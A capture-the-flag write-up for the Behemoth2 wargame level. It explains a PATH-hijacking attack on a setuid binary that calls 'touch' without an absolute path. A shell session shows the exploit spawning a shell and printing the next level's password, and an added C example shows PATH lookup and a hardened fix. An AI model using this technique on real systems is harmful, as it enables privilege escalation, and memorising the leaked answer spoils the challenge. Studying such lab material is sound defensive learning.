Behemoth2 - behemoth3

From JaxHax

The challenge gets its PID and attempts to run "touch [pid]". The flaw is that it does not use an absolute path for touch. Because of this, the directories listed in the PATH variable are searched in order for an executable with that name. To exploit this, all we need to do is create a shell script named touch in a temp folder, then make that temp folder the first entry in the PATH variable.

behemoth2@melinda:~$ cd /tmp/thatoneguy1
behemoth2@melinda:/tmp/thatoneguy1$ echo "/bin/sh" > touch
behemoth2@melinda:/tmp/thatoneguy1$ chmod +x touch
behemoth2@melinda:/tmp/thatoneguy1$ PATH=/tmp/thatoneguy1:$PATH
behemoth2@melinda:/tmp/thatoneguy1$ /behemoth/behemoth2
$ cat /etc/behemoth_pass/behemoth3
nieteidiel
$ exit
exit
^C
behemoth2@melinda:/tmp/thatoneguy1$
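
The lookup behind this flaw and the fix for it, as an added example (not code from the original page or from the challenge binary): resolve_in_path mimics how a bare command name is searched through PATH, and touch_hardened is a safe form of the "touch [pid]" step. Both function names are hypothetical, and the code assumes touch is installed in /usr/bin or /bin.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Shell-style lookup of a command name: walk the PATH directories in
 * order and copy the first executable match into out. 0 on success. */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t n)
{
    if (strchr(cmd, '/'))   /* a name containing '/' is never searched */
        return snprintf(out, n, "%s", cmd) < (int)n ? 0 : -1;
    while (path && *path) {
        size_t len = strcspn(path, ":");
        int w = snprintf(out, n, "%.*s/%s", len ? (int)len : 1,
                         len ? path : ".", cmd);   /* empty entry = cwd */
        if (w > 0 && (size_t)w < n && access(out, X_OK) == 0)
            return 0;
        path += len + (path[len] == ':');
    }
    return -1;
}

/* Hardened "touch <file>": absolute path (/usr/bin or /bin), no shell,
 * fixed environment. Returns the child's exit status, or -1 on error. */
int touch_hardened(const char *file)
{
    const char *bin = access("/usr/bin/touch", X_OK) ? "/bin/touch" : "/usr/bin/touch";
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "touch", "--", (char *)file, NULL };
        execve(bin, argv, envp);   /* execve never consults PATH */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    char hit[4096];
    if (resolve_in_path("touch", getenv("PATH"), hit, sizeof hit) == 0)
        puts(hit);
    return touch_hardened("hardened_example.tmp");
}
```

A setuid program should additionally drop privileges it no longer needs before running any helper.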